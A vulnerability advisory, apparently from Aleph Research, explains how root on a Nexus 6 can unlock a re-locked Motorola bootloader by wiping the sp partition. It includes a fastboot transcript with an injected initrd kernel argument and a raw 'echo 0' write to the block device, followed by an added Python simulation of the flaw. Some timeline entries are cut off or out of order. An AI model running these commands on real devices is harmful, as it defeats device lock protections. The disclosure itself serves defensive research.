
Motorola Android Bootloader: Unlocking a Re-locked Bootloader from the Platform OS

Aleph Research Advisory

Product

Google Nexus 6 (shamu)

Technical Details

Back in 2013, Dan Rosenberg found a vulnerability in the Motorola TrustZone kernel that allowed him to unlock the Motorola bootloader. In his write-up, Dan described how Motorola implements bootloader locking (the same scheme applies to shamu, the Nexus 6), which can be summarized as the following state machine:

 .---------.
 | Factory |       .----------.
 | Locked  | --->  | Unlocked |  <---.  (3)
 `---------' (1)   `-----.----'      |      
                         |      .-----------.
                         `----> | Re-locked |
                           (2)  `-----------'

The transitions are as follows:

  1. The user unlocks the device for the first time. The WARRANTYVOID qfuse is blown. This transition is performed by the TEE, so it cannot be carried out from the Platform OS.
  2. The user re-locks the device. The bootloader writes an entry to the sp partition, carrying an HMAC produced by the TEE.
  3. The user unlocks the device again. The bootloader removes that entry.

Conclusion: the bootloader treats a missing (or invalid) re-lock entry as "unlocked". An attacker with unrestricted root on the Platform OS (as one could gain by exploiting CVE-2016-10277) can therefore unlock a re-locked bootloader simply by invalidating the sp partition; no TEE involvement and no knowledge of the HMAC key are required. The WARRANTYVOID fuse stays blown, so the device keeps reporting iswarrantyvoid: yes afterwards, as the transcript below shows.

 $ fastboot getvar all
 ...
 (bootloader) secure: yes
 (bootloader) unlocked: no
 (bootloader) securestate: locked
 (bootloader) iswarrantyvoid: yes
 (bootloader) mot_sst: 2
 
 $ fastboot oem config fsg-id "a initrd=0x11000000,1519997"
 $ fastboot flash foo initroot.cpio.gz
 $ fastboot continue
 
 $ adb shell
 shamu:/ # echo 0 > /dev/block/platform/msm_sdcc.1/by-name/sp
 shamu:/ # reboot bootloader
 
 $ fastboot getvar all
 ...
 (bootloader) unlocked: yes
 (bootloader) securestate: unlocked
 (bootloader) iswarrantyvoid: yes
 (bootloader) mot_sst: 3
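The state machine and the transcript above, modelled in Python as an added example (this is not code from the advisory, from Aleph Research or from Motorola). The TEE key, the sp record layout (value followed by an HMAC-SHA256), the class and function names and the "fail-closed" alternative design are all assumptions made here for illustration; only the three transitions and the "no valid record means unlocked" behaviour come from the advisory.

```python
import hashlib
import hmac

# Constructed stand-in for the HMAC key that lives inside TrustZone (assumption:
# the real key, layout and algorithm are not described by the advisory).
TEE_KEY = b"constructed key: stands in for the HMAC key kept inside TrustZone"
MAC_LEN = hashlib.sha256().digest_size


def tee_hmac(value: bytes) -> bytes:
    """Stand-in for the TEE service the bootloader calls; the Platform OS never sees TEE_KEY."""
    return hmac.new(TEE_KEY, value, hashlib.sha256).digest()


def read_record(sp: bytes):
    """Parse the sp partition as <value><HMAC>.
    Anything malformed or carrying a bad MAC is treated as 'no record' (None)."""
    if len(sp) <= MAC_LEN:
        return None
    value, mac = sp[:-MAC_LEN], sp[-MAC_LEN:]
    if not hmac.compare_digest(mac, tee_hmac(value)):
        return None
    return value


class Shamu:
    """Bootloader logic as described in the advisory: a valid 'relocked' record
    in sp means locked; no record (or an invalid one) means unlocked."""

    RELOCKED = b"relocked"

    def __init__(self):
        self.warrantyvoid_fuse = False  # WARRANTYVOID qfuse: one-way, blown by the TEE
        self.sp = b""                   # raw contents of the sp partition

    def oem_unlock(self):               # fastboot oem unlock
        self.warrantyvoid_fuse = True   # (1) the first unlock blows the fuse
        self.sp = b""                   # (3) later unlocks remove the record

    def oem_lock(self):                 # fastboot oem lock
        self.sp = self.RELOCKED + tee_hmac(self.RELOCKED)  # (2) TEE-produced HMAC

    def securestate(self) -> str:       # what `fastboot getvar securestate` reports
        if not self.warrantyvoid_fuse:
            return "locked"             # factory locked
        if read_record(self.sp) == self.RELOCKED:
            return "locked"             # re-locked
        return "unlocked"               # missing or invalid record: fails open

    def root_echo_zero_to_sp(self):     # `echo 0 > /dev/block/.../by-name/sp` as root
        self.sp = b"0\n"                # no TEE key needed: the record just has to be gone


class ShamuFailClosed(Shamu):
    """Assumed alternative design (not Motorola's fix): the TEE-signed record asserts
    'unlocked', so a wiped or forged sp leaves a fused device locked."""

    UNLOCKED = b"unlocked"

    def oem_unlock(self):
        self.warrantyvoid_fuse = True
        self.sp = self.UNLOCKED + tee_hmac(self.UNLOCKED)  # TEE signs the unlock instead

    def oem_lock(self):
        self.sp = b""                   # removing the record now means locked

    def securestate(self) -> str:
        if self.warrantyvoid_fuse and read_record(self.sp) == self.UNLOCKED:
            return "unlocked"
        return "locked"                 # missing or invalid record: fails closed


def walk(device):
    """Factory -> unlock -> re-lock -> root wipes sp -> root forges a record.
    Returns the securestate observed after each step."""
    states = [device.securestate()]
    device.oem_unlock()
    states.append(device.securestate())
    device.oem_lock()
    states.append(device.securestate())
    device.root_echo_zero_to_sp()
    states.append(device.securestate())
    # Root tries to forge the record that would grant 'unlocked' in the fail-closed
    # design; without TEE_KEY the MAC is wrong and read_record() rejects it.
    device.sp = b"unlocked" + b"\x00" * MAC_LEN
    states.append(device.securestate())
    return states


if __name__ == "__main__":
    print("advisory design :", walk(Shamu()))
    print("fail-closed     :", walk(ShamuFailClosed()))
```

The fourth state of each walk is the point of the advisory: the HMAC only protects the integrity of a re-lock record, not its presence, so root needs no key to get back to "unlocked". In the fail-closed variant the signed record is the thing that grants unlock, and destroying or forging it leaves the device locked.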

Timeline

  • 05-Jun-17: Added as
  • 05-Jun-17: Reported to Android Security
  • 12-Jun-17: Deadline
  • 14-Aug-17: Deadline extension
  • 13-Jun-17: Vendor initial triage: Moderate
  • 29-Jun-17: Vendor message
  • 02-Jul-17: Researcher message
  • 11-Jul-17: Vendor triaged as
  • 15-Aug-17: Public disclosure: USENIX WOOT '17
  • 30-Aug-17: Public disclosure: alephsecurity.com